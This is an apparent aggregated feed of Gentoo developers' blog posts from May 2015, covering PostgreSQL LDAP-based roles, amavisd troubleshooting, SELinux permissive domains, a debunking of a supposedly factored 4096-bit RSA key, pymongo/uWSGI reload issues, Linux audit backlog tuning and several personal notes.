The postgres_admin role is created whenever I create a PostgreSQL instance. Likewise, a number of roles are added for the databases as well. For instance, for the db_hadoop database, the hdc_owner, hdc_reader and hdc_readwrite roles are created with the right set of privileges. Users are then granted these roles if they belong to the right group in the LDAP. For instance:

# getent group gpgsqlhdc_own
gpgsqlhdc_own:x:413850:hadoop,johan,christov,sean
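The data roles referenced by such a group could themselves have been created along the following lines (a sketch only; the exact privileges will differ per setup, and table-level grants are left out here):

-- sketch: per-database roles for db_hadoop
CREATE ROLE hdc_owner NOLOGIN;
CREATE ROLE hdc_readwrite NOLOGIN;
CREATE ROLE hdc_reader NOLOGIN;
GRANT ALL PRIVILEGES ON DATABASE db_hadoop TO hdc_owner;
GRANT CONNECT ON DATABASE db_hadoop TO hdc_reader, hdc_readwrite;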

With this simple approach, granting users access to a database is a matter of adding the user to the right group (like gpgsqlhdc_ro for read-only access to the Hadoop-related database(s)) and either waiting for the cron job to pick it up or manually running the authorization synchronization. By standardizing on infrastructural roles (admin, auditor) and data roles (owner, rw, ro), managing multiple databases is a breeze.

May 23, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hello!

The Troisdorf Linux User Group (TroLUG for short) is hosting

on Saturday, 1 August 2015
in Troisdorf near Köln/Bonn

a Gentoo workshop aimed at advanced users.

More details, the exact address and the schedule can be found on the corresponding TroLUG page.

Regards,

 

Sebastian

Alexys Jacob a.k.a. ultrabug (homepage, bugs)

Good news for gevent users blocked on python < 2.7.9 due to broken SSL support since python upstream dropped the private API _ssl.sslwrap that gevent was using.

This issue was starting to get old and problematic since GLSA 2015-0310, but I’m happy to say that almost 6 hours after the gevent-1.0.2 release, it is already available in portage!

We were also affected by this issue at work, so I’m glad that the tension this issue was causing between ops and devs will finally be over ;)

May 22, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Three new quotes to the database (May 22, 2015, 18:19 UTC)

Today I added three new quotes to the “My Favourite Quotes” database that you see on the right-hand side of my blog.

“The evil people of the world would have little impact without the sheep.”
–Tim Clark

“Apologising does not always mean that you’re wrong and the other person is right. It just means that you value your relationship more than your ego.”
–Unknown

“Some day soon, perhaps in forty years, there will be no one alive who has ever known me. That’s when I will be truly dead – when I exist in no one’s memory. I thought a lot about how someone very old is the last living individual to have known some person or cluster of people. When that person dies, the whole cluster dies, too, vanishes from the living memory. I wonder who that person will be for me. Whose death will make me truly dead?”
–Irvin D. Yalom in Love’s Executioner and Other Tales of Psychotherapy

The first one came up during a conversation that I was having with a colleague who is absolutely brilliant. That quote in particular sums up a very simplistic idea, but one that would have a dramatic impact on human existence if we were to recognise our sometimes blind following of others.

Cheers,
Zach

May 20, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

Late last night, I decided to apply some needed updates to my personal mail server, which is running Gentoo Linux (OpenRC) with a mail stack of Postfix & Dovecot with AMaViS (filtering based on SpamAssassin, ClamAV, and Vipul’s Razor). After applying the updates, and restarting the necessary components of the mail stack, I ran my usual test of sending an email from one of my accounts to another one. It went through without a problem.

However, I realised that it isn’t a completely valid test to send an email from one internal account to another because I have amavisd configured to not scan anything coming from my trusted IPs and domains. I noticed several hundred mails in the queue when I ran postqueue -p, and they all had notices similar to:


status=deferred (delivery temporarily suspended:
connect to 127.0.0.1[127.0.0.1]:10024: Connection refused)

That indicated to me that it wasn’t a problem with Postfix (and I knew it wasn’t a problem with Dovecot, because I could connect to my accounts via IMAP). Seeing as amavisd runs on localhost:10024, I figured that that was where the problem had to be. Often, a “connection refused” notification means that no service is listening on that port. You can see which ports are in a listening state, and which processes, applications, or daemons are listening on them, by running:

netstat -tupan | grep LISTEN

When I did that, I noticed that amavisd wasn’t listening on port 10024, which made me think that it wasn’t running at all. That’s when I ran into the strange part of the problem: the init script output:

# /etc/init.d/amavisd start
* WARNING: amavisd has already been started
# /etc/init.d/amavisd stop
The amavisd daemon is not running                [ !! ]
* ERROR: amavisd failed to start

So, apparently it is running and not running at the same time (sounds like a Linux version of Schrödinger’s cat to me)! It was obvious, though, that it wasn’t actually running (which could be verified with ‘ps -elf | grep -i amavis’). So, what to do? I tried manually removing the PID file, but that actually just made matters a bit worse. Ultimately, this combination is what fixed the problem for me:


sa-update
/etc/init.d/amavisd zap
/etc/init.d/amavisd start

It seems that the SpamAssassin rules file had gone missing, and that was causing amavisd to not start properly. Manually updating the rules file (with ‘sa-update’) regenerated it, and then I zapped amavisd completely, and lastly restarted the daemon.

Hope that helps anyone running into the same problem.

Cheers,
Zach

EDIT: I have included a new post about debugging amavisd start-up problems.

Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
GNOME Asia 2015 (May 20, 2015, 08:08 UTC)

I was in Depok, Indonesia last week to speak at GNOME Asia 2015. It was a great experience — the organisers did a fantastic job and as a bonus, the venue was incredibly pretty!

View from our room

My talk was about the GNOME audio stack, and my original intention was to talk a bit about the APIs, how to use them, and how to choose which to use. After the first day, though, I felt like a more high-level view of the pieces would be more useful to the audience, so I adjusted the focus a bit. My slides are up here.

Nirbheek and I then spent a couple of days going down to Yogyakarta to cycle around, visit some temples, and sip some fine hipster coffee.

All in all, it was a week well spent. I’d like to thank the GNOME Foundation for helping me get to the conference!

Sponsored by GNOME!

May 19, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, it was that time of the year again this past weekend–time for the 2015 St. Louis Children’s Hospital Make Tracks for the Zoo race! This race is always one of my favourite ones of the year, so I was excited to partake in it. There’s always a great turnout (~3500 this year, I believe, but 1644 chipped for the 5K run), and lots of fun, family-oriented activities. One of the best parts is that there are people of all ages, and walks of life (pun intended) who show up to either walk or run to support the amazing Saint Louis Zoo!


2015 St. Louis Make Tracks for the Zoo – Pre-race

It started out a little iffy this year because there was some substantial rain. Ultimately, though, the rain cleared and the sun started shining in time for the race. The only downside was that the course was pretty slick due to the rain. Despite the slippery course, I did better than expected in terms of time. My total 5K time was 19’06”, according to the chip-timing provided by Big River Running Company (which is a great local running store here in the Saint Louis area). You can see the full results, and sort by whatever criteria you would like by visiting their ChronoTrack site for this race.


2015 St. Louis Make Tracks for the Zoo results

There were some great runners this year! My time earned me 13th overall, 11th in overall male, and 3rd in my bracket (which is now Male 30-34 [ugh, can't believe I turned 30 this month]). Some really outstanding participants (besides the obvious of the overall winners) this year were Zachary Niemeyer, who at 14 finished 15th overall with a great time of 19’10”, and Norman Jamieson, who at age 79 finished in just over 33 minutes! I’ll be lucky to be able to walk at that age! :-)


Me, tired and sweaty from the humidity, but happy with the experience

So, it was another great year for Make Tracks (especially since it was the 30th year for it), and I’m already looking forward to next year’s race. Hopefully you’ll come and join in a fun time that supports a great establishment!

Cheers,
Zach

P.S. A special thanks to my Pops for not only coming out to support me, but also for snapping the photos above!

May 18, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Testing with permissive domains (May 18, 2015, 11:40 UTC)

When testing out new technologies or new setups, not having (proper) SELinux policies can be a nuisance. Not only is the number of SELinux policies available through the standard repositories limited, some of these policies are not even written with the same level of confinement that an administrator might expect. Or perhaps the technology to be tested is used in a completely different manner.

Without proper policies, any attempt to start such a daemon or application will likely cause permission violations. In many cases, developers or users then tend to disable SELinux enforcement entirely so that they can continue playing with the new technology. And why not? After all, policy development is to be done after the technology is understood.

But putting the entire system in permissive mode is overkill. It is much easier to start with a very simple policy and then mark the domain as a permissive domain. The software, after transitioning into this “simple” domain, is then no longer subject to SELinux enforcement, whereas the rest of the system remains in enforcing mode.

For instance, create a minuscule policy like so:

policy_module(testdom, 1.0)

type testdom_t;
type testdom_exec_t;
init_daemon_domain(testdom_t, testdom_exec_t)
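To build and load such a module, something along these lines can be used (a sketch; the exact Makefile location depends on the distribution and the policy type, and the policy source is assumed to be in testdom.te):

~# make -f /usr/share/selinux/strict/include/Makefile testdom.pp
~# semodule -i testdom.pp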

Mark the executable for the daemon as testdom_exec_t (after building and loading the minuscule policy):

~# chcon -t testdom_exec_t /opt/something/bin/daemond

Finally, tell SELinux that testdom_t is to be seen as a permissive domain:

~# semanage permissive -a testdom_t

When finished, don’t forget to remove the permissive bit (semanage permissive -d testdom_t) and unload/remove the SELinux policy module.

And that’s it. If the daemon is now started (through a standard init script) it will run as testdom_t and everything it does will be logged, but not enforced by SELinux. That might even help in understanding the application better.
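The (non-enforced) accesses that get logged this way can afterwards be reviewed with ausearch, for instance like so (assuming the audit daemon is running):

~# ausearch -m avc -ts recent | grep testdom_t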

May 17, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr: The news about a broken 4096 bit RSA key is not true. It is just a faulty copy of a valid key.

Earlier today a blog post claiming the factoring of a 4096 bit RSA key was published and quickly made it to the top of Hacker News. The key in question was the PGP key of a well-known Linux kernel developer. I already commented on Hacker News why this is most likely wrong, but I thought I'd write up some more details. To understand what is going on I have to explain some background both on RSA and on PGP keyservers. This by itself is pretty interesting.

RSA public keys consist of two values called N and e. The N value, called the modulus, is the interesting one here. It is the product of two very large prime numbers. The security of RSA relies on the fact that these two prime factors are secret. If an attacker were able to gain knowledge of these numbers, he could use them to calculate the private key. That's the reason why RSA depends on the hardness of the factoring problem. If someone can factor N, he can break RSA. For all we know today, factoring is hard enough to make RSA secure (at least as long as there are no large quantum computers).

Now imagine you have two RSA keys, but they have been generated with bad random numbers. They are different, but one of their primes is the same. That means we have N1=p*q1 and N2=p*q2. In this case RSA is no longer secure, because calculating the greatest common divisor (GCD) of two large numbers can be done very quickly with the Euclidean algorithm, so one can compute the shared prime value.
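As a toy illustration (with tiny made-up numbers, nothing like real key sizes), recovering a shared prime really is that simple:

from math import gcd

# two "moduli" that accidentally share the prime factor 11
N1 = 11 * 13
N2 = 11 * 17

p = gcd(N1, N2)            # recovers the shared prime: 11
q1, q2 = N1 // p, N2 // p  # 13 and 17 - both keys are now factored
print(p, q1, q2)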

It is not only possible to break RSA keys if you have two keys with a shared factor, it is also possible to take a large set of keys and find shared factors between them. In 2012 Arjen Lenstra and his team published a paper applying this attack to large key sets, and at the same time Nadia Heninger and a team at the University of Michigan independently performed the same attack. This uncovered a lot of vulnerable keys on embedded devices, but these were mostly SSH and TLS keys. Lenstra's team however also found two vulnerable PGP keys. For more background you can watch this 29C3 talk by Nadia Heninger, Dan Bernstein and Tanja Lange.

PGP keyservers have been around for quite some time, and they have a property that makes them especially interesting for this kind of research: they usually never delete anything. You can add a key to a keyserver, but you cannot remove it; you can only mark it as invalid by revoking it. Therefore the data from the keyservers gives you a large set of cryptographic keys.

Okay, so back to the news about the supposedly broken 4096 bit key: There is a service called Phuctor where you can upload a key and it'll check it against a set of known vulnerable moduli. This service identified the supposedly vulnerable key.

The key in question has the key id e99ef4b451221121 and belongs to the master key bda06085493bace4. Here is the vulnerable modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82913ff626efddfb f8ae8f1d40da8d13 a90138686884bad1 9db776bb4812f7e3 b288b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

In fact this modulus is easily factorable, because it can be divided by 3. However if you look at the master key bda06085493bace4 you'll find another subkey with this modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82c37b8cca2eb4ac 1e889d1027bc1ed6 664f3877cd7052c6 db5567a3365cf7e2 c688b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

You may notice that these look pretty similar. But they are not the same. The second one is the real subkey, the first one is just a copy of it with errors.

If you run a batch GCD analysis on the full PGP key server data you will find a number of such keys (Nadia Heninger has published code to do a batch GCD attack). I don't know how they end up on the key servers; I assume they are produced by network errors, hard disk failures or software bugs. It may also be that someone just created them in some experiment.

The important thing is: Everyone can generate a subkey to any PGP key and upload it to a key server. That's just the way the key servers work. They don't check keys in any way. However these keys should pose no threat to anyone. The only case where this could matter would be a broken implementation of the OpenPGP key protocol that does not check if subkeys really belong to a master key.

However you won't be able to easily import such a key into your local GnuPG installation. If you try to fetch this faulty sub key from a key server GnuPG will just refuse to import it. The reason is that every sub key has a signature that proves that it belongs to a certain master key. For those faulty keys this signature is obviously wrong.

Now here's my personal tie-in to this story: Last year I started a project to analyze the data on the PGP key servers. At some point I thought I had found a large number of vulnerable PGP keys – including the key in question here. In a rush I wrote a mail to all people affected. Only later did I find out that something was not right, and I wrote to all affected people again, apologizing. Most of the keys I thought I had found were just faulty keys on the key servers.

The code I used to parse the PGP key server data is public; I also wrote a background paper and gave a talk at the BsidesHN conference.

May 14, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, sometimes there is a mistake so blatantly obvious on a website that it just has to be shared with others. I was looking at the Material Safety Data Sheets from Exxon Mobil (don’t ask; I was just interested in seeing the white paper on Mobil jet oil), and I noticed something rather strange in the drop-down menu:



(screenshot of the country drop-down menu)

Yup, apparently now Africa is a country. Funny, all this time I thought it was a continent. Interestingly enough, you can see that they did list Angola and Botswana as countries. Countries within countries—either very meta, or along the lines of country-ception (oh the double entendre), but I digress…

Cheers,
Zach

May 13, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
uWSGI, gevent and pymongo 3 threads mayhem (May 13, 2015, 14:56 UTC)

This is a quick heads-up post about a behaviour change when running a gevent based application using the new pymongo 3 driver under uWSGI and its gevent loop.

I was naturally curious about testing this brand new and major update of the python driver for mongoDB, so I just played it dumb: update and give it a try on our existing code base.

The first thing I noticed instantly was that a vast majority of our applications were suddenly unable to reload gracefully and were force-killed by uWSGI after some time!

worker 1 (pid: 9839) is taking too much time to die...NO MERCY !!!

uWSGI’s gevent-wait-for-hub

All our applications must be able to be gracefully reloaded at any time. Some of them spawn quite a few greenlets on their own, so as an added measure to make sure we never lose any running greenlet, we use the gevent-wait-for-hub option, which is described as follows:

wait for gevent hub's death instead of the control greenlet

… which does not mean a lot but is explained in a previous uWSGI changelog:

During shutdown only the greenlets spawned by uWSGI are taken in account,
and after all of them are destroyed the process will exit.

This is different from the old approach where the process wait for
ALL the currently available greenlets (and monkeypatched threads).

If you prefer the old behaviour just specify the option gevent-wait-for-hub

pymongo 3

Compared to its previous 2.x versions, one of the key overall aspects of the new pymongo 3 driver is its intensive usage of threads to handle server discovery and connection pools.

Now we can relate this very fact to the gevent-wait-for-hub behaviour explained above:

the process wait for ALL the currently available greenlets
(and monkeypatched threads)

This explains why our applications were hanging until the reload-mercy (force kill) timeout option of uWSGI hit the fan!

conclusion

When using pymongo 3 with the gevent-wait-for-hub option, you have to keep in mind that all of pymongo’s threads (now monkey-patched threads) are considered active greenlets and will thus be waited on for termination before uWSGI recycles the worker!

Two options come to mind to handle this properly:

  1. stop using the gevent-wait-for-hub option and change your code to use a gevent pool group to make sure that all of your important greenlets are taken care of when a graceful reload happens (this is how we do it today; the gevent-wait-for-hub option was just overprotective for us). See the sketch after this list.
  2. modify your code to properly close all your pymongo connections on graceful reloads.
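A rough sketch of option 1 (purely illustrative, with a hypothetical background task; how the shutdown hook gets wired into your reload path depends on your application):

import gevent
from gevent.pool import Group

# group holding the greenlets we explicitly care about
workers = Group()

def background_task():
    # hypothetical periodic job, stands in for real application greenlets
    while True:
        gevent.sleep(60)

workers.spawn(background_task)

def on_graceful_reload():
    # wait a bit for our own greenlets, then kill the stragglers,
    # instead of relying on gevent-wait-for-hub to wait for everything
    workers.join(timeout=10)
    workers.kill(block=True, timeout=5)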

Hope this will save some people the trouble of debugging this ;)

May 10, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Audit buffering and rate limiting (May 10, 2015, 12:18 UTC)

Be it because of SELinux experiments or through general audit experiments, sooner or later you’ll run into a message similar to the following:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

The message shows up when certain audit events could not be logged through the audit subsystem. Depending on the system configuration, they might be ignored, sent through the kernel logging infrastructure, or even cause the system to panic. And if the messages are sent to the kernel log, they might show up there, but even that log has its limitations, which can lead to output similar to the following:

__ratelimit: 53 callbacks suppressed

In this post, I want to give some pointers on configuring the audit subsystem, as well as on understanding these messages…

There is auditd and kauditd

If you take a look at the audit processes running on the system, you’ll notice that (assuming Linux auditing is used of course) two processes are running:

# ps -ef | grep audit
root      1483     1  0 10:11 ?        00:00:00 /sbin/auditd
root      1486     2  0 10:11 ?        00:00:00 [kauditd]

The /sbin/auditd daemon is the user-space audit daemon. It registers itself with the Linux kernel audit subsystem (through the audit netlink system), which responds by spawning the kauditd kernel thread/process. The fact that it is a kernel-level process is why kauditd is shown within brackets in the ps output.

Once this is done, audit messages are communicated through the netlink socket to the user-space audit daemon. For the detail-oriented people amongst you, look for the kauditd_send_skb() method in the kernel/audit.c file. Now, generated audit event messages are not directly relayed to the audit daemon – they are first queued in a sort-of backlog, which is where the backlog-related messages above come from.

Audit backlog queue

In the kernel-level audit subsystem, a socket buffer queue is used to hold audit events. Whenever a new audit event is received, it is logged and prepared to be added to this queue. Adding to this queue can be controlled through a few parameters.

The first parameter is the backlog limit. Be it through a kernel boot parameter (audit_backlog_limit=N) or through a message relayed by the user-space audit daemon (auditctl -b N), this limit ensures that the queue cannot grow beyond a certain size (expressed in the number of messages). If an audit event is logged which would grow the queue beyond this limit, then a failure occurs and is handled according to the system configuration (more on that later).

The second parameter is the rate limit. When more audit events are logged within a second than set through this parameter (which can be controlled through a message relayed by the user-space audit system, using auditctl -r N) then those audit events are not added to the queue. Instead, a failure occurs and is handled according to the system configuration.

Only when neither limit is reached is the message added to the queue, allowing the user-space audit daemon to consume the events and log them according to the audit configuration. There are some good resources on audit configuration available on the Internet. I find this SUSE chapter worth reading, but many others exist as well.
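Both limits can be changed at runtime with the auditctl flags mentioned above, for instance:

# auditctl -b 8192    # allow up to 8192 queued audit events
# auditctl -r 0       # do not rate limit audit event generation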

There is a useful command related to the subject of the audit backlog queue. It queries the audit subsystem for its current status:

# auditctl -s
AUDIT_STATUS: enabled=1 flag=1 pid=1483 rate_limit=0 backlog_limit=8192 lost=3 backlog=0

The command displays not only the audit state (enabled or not) but also the settings for rate limits (on the audit backlog) and backlog limit. It also shows how many events are currently still waiting in the backlog queue (which is zero in our case, so the audit user-space daemon has properly consumed and logged the audit events).

Failure handling

If an audit event cannot be logged, then this failure needs to be resolved. The Linux audit subsystem can be configured to either silently discard the message, switch to the kernel log subsystem, or panic. This can be configured through the audit user-space tools (auditctl -f [0..2]), but is usually left at the default (which is 1, i.e. switch to the kernel log subsystem).
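For instance, to explicitly (re)set the failure handling to the default kernel-log behaviour:

# auditctl -f 1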

Before that happens, a message is displayed that reveals why the failure handling was triggered:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

In this case, the backlog queue was set to contain at most 320 entries (which is low for a production system) and more messages were being added (the Linux kernel in certain cases allows a few more entries than configured, for performance and consistency reasons). The number of events already lost is displayed, as well as the current limitation settings. The message “backlog limit exceeded” can be “rate limit exceeded” if that was the limitation that was triggered.

Now, if the system is not configured to silently discard the messages, or to panic the system, then the “dropped” messages are sent to the kernel log subsystem. These calls, however, are also governed by a configurable limitation: a rate limit which can be set through sysctl:

# sysctl -a | grep kernel.printk_rate
kernel.printk_ratelimit = 5
kernel.printk_ratelimit_burst = 10

In the above example, this system allows one message every 5 seconds, but does allow a burst of up to 10 messages at once. When the rate limitation kicks in, then the kernel will log (at most one per second) the number of suppressed events:

[40676.545099] __ratelimit: 246 callbacks suppressed

Although this limit is kernel-wide, not all kernel log events are governed by it. It is the calling subsystem (in our case, the audit subsystem) that is responsible for deciding whether its events are subject to this rate limiting or not.

Finishing up

Before waving goodbye, I would like to point out that the backlog queue is a memory queue (and not on disk, Red Hat), just in case it wasn’t obvious. Increasing the queue size can result in more kernel memory consumption. Apparently, a practical size estimate is around 9000 bytes per message. On production systems, it is advised not to make this setting too low. I personally set it to 8192.
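To make such a backlog setting persistent across reboots, the same control option can be placed in the audit rules file (a sketch; the exact location of the rules file may differ between distributions):

# /etc/audit/audit.rules (fragment)
-b 8192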

Lost audit events might make troubleshooting more difficult, which is often the case when dealing with new or experimental SELinux policies. They would also mean missing security-important events. It is the audit subsystem, after all. So tune it properly, and enjoy the power of Linux’ audit subsystem.

May 09, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Reviving Gentoo VMware support (May 09, 2015, 23:41 UTC)

Sadly, over the last months the support for VMware Workstation and friends in Gentoo has dropped a lot. Why? Well, I was the only developer left who cared, and it's definitely not at the top of my Gentoo priorities list. To be honest, that has not really changed. However... let's try to harness the power of the community now.

I've pushed a mirror of the Gentoo vmware overlay to Github, see


If you have improvements, version bumps, ... feel free to submit pull requests. Everything related to VMware products is acceptable. I hope that over time some more people will sign up and help with merging. Just be careful when using the overlay; it likely won't get the same level of review as ebuilds in the main tree.
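For those wanting to try it: assuming the overlay is (still) registered in layman's overlay list under the name vmware (an assumption on my side, not something stated above), adding and syncing it would look roughly like:

# layman -a vmware     # add the overlay
# layman -s vmware     # sync it later on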